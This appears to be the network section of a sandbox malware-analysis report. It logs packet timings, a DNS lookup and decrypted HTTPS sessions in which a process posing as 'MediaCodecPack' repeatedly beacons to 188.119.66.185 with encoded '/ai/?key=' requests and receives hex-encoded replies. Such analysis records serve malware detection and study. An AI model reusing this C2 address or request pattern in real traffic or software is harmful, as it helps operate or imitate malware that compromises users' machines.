                                                                              Dec 18, 2024 13:51:17.431710005 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:17.431735992 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.077519894 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.083606005 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084186077 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084186077 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.084194899 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.084218979 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761482000 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761563063 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.761691093 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.761691093 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.785007000 CET49930443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.785027981 CET44349930188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.940355062 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.940404892 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:19.940474987 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.944665909 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:19.944681883 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.596735954 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.596955061 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597579002 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597589016 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:21.597754955 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:21.597759962 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288171053 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288254023 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.288456917 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.288611889 CET49936443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.288633108 CET44349936188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.407002926 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407102108 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:22.407196045 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407443047 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:22.407480955 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.865694046 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.865961075 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866607904 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866636038 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:23.866786957 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:23.866800070 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562840939 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562908888 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.562926054 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562942028 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.562974930 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.562988043 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.563128948 CET49943443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.563148022 CET44349943188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.680969954 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681009054 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:24.681103945 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681363106 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:24.681374073 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.135970116 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.136096954 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.136655092 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.136662960 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.138484955 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.138490915 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821641922 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821712971 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.821755886 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821779013 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821945906 CET49950443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.821962118 CET44349950188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.930989981 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931020975 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:26.931081057 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931360006 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:26.931371927 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.436795950 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.436908007 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437354088 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437369108 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:28.437604904 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:28.437611103 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120852947 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120919943 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.120933056 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120948076 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.120984077 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.120995998 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.124192953 CET49956443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.124207973 CET44349956188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.243437052 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243480921 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:29.243803024 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243803024 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:29.243837118 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:30.915045977 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:30.915112972 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:30.915586948 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:30.915601969 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:30.915771961 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:30.915780067 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:31.622210026 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:31.622395992 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:31.622430086 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.622461081 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.622843981 CET49963443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.622868061 CET44349963188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:31.778611898 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.778665066 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:31.778754950 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.826566935 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:31.826591015 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:33.329775095 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:33.333518982 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:33.334012032 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:33.334017992 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:33.334072113 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:33.334083080 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:34.088449955 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:34.088536024 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:34.088666916 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.088668108 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.090954065 CET49969443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.090976000 CET44349969188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:34.213663101 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.213699102 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:34.213757992 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.214044094 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:34.214052916 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:35.870608091 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:35.870738029 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:35.871273994 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:35.871284008 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:35.871455908 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:35.871462107 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:36.552872896 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:36.552944899 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:36.553014994 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.553041935 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.553318024 CET49975443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.553335905 CET44349975188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:36.665579081 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.665625095 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:36.665873051 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.666680098 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:36.666691065 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:38.316190004 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:38.316314936 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:38.316781998 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:38.316792965 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:38.316956997 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:38.316962957 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:39.002816916 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:39.002891064 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:39.002965927 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:39.003154993 CET49981443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:39.003169060 CET44349981188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:39.118519068 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:39.118541002 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:39.118612051 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:39.118864059 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:39.118879080 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:40.821093082 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:40.821190119 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:40.821676970 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:40.821687937 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:40.821846008 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:40.821851015 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:41.523865938 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:41.523932934 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.523945093 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:41.524029016 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.524230003 CET49989443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.524246931 CET44349989188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:41.636262894 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.636307001 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:41.636365891 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.636622906 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:41.636636972 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.172909021 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.173049927 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.173510075 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.173520088 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.173732042 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.173738003 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.939657927 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.939723015 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.939727068 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:43.939769030 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.939929008 CET49995443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:43.939949036 CET44349995188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:44.055771112 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:44.055814981 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:44.055924892 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:44.056149960 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:44.056160927 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:45.698229074 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:45.698502064 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:45.698894024 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:45.698896885 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:45.700748920 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:45.700752974 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:46.468767881 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:46.468830109 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:46.468833923 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.468935966 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.469103098 CET50001443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.469118118 CET44350001188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:46.589946985 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.589993000 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:46.590064049 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.590307951 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:46.590322971 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.200963974 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.203505039 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.205348969 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.205348969 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.205355883 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.205374956 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.968240976 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.968291998 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.968317986 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.968349934 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:48.968369007 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.968383074 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.980823040 CET50004443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:48.980848074 CET44350004188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:49.143534899 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:49.143589973 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:49.143656969 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:49.144587994 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:49.144599915 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:50.614547968 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:50.614744902 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:50.616113901 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:50.616132021 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:50.617825985 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:50.617854118 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:51.353333950 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:51.353409052 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.353426933 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:51.353550911 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.353735924 CET50005443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.353779078 CET44350005188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:51.466335058 CET50006443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.466382027 CET44350006188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:51.466536045 CET50006443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.466775894 CET50006443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:51.466792107 CET44350006188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:52.924165010 CET44350006188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:52.924242973 CET50006443192.168.2.10188.119.66.185
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 18, 2024 13:49:44.712235928 CET1.1.1.1192.168.2.100xd108No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 18, 2024 13:49:44.712235928 CET1.1.1.1192.168.2.100xd108No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                              • 188.119.66.185
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049838188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:44 UTC283OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:50:44 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:50:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:50:44 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049848188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:46 UTC283OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:50:47 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:50:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:50:47 UTC774INData Raw: 32 66 61 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 37 32 66 62 36 62 66 38 65 38 31 32 32 34 66 62 38 33 64 63 31 39 33 32 63 39 61 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 31 63 32 33 66 66 34 66 37 63 37 66 32 34 38 31 32 38 64 34 36 39 39 33 65 61 35 33 37
                                                                              Data Ascii: 2fa8b723c68ee18403c660fbfe038472fb6bf8e81224fb83dc1932c9a7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049860188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:52 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:50:53 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:50:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:50:53 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049866188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:54 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:50:55 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:50:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:50:55 UTC630INData Raw: 32 36 61 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
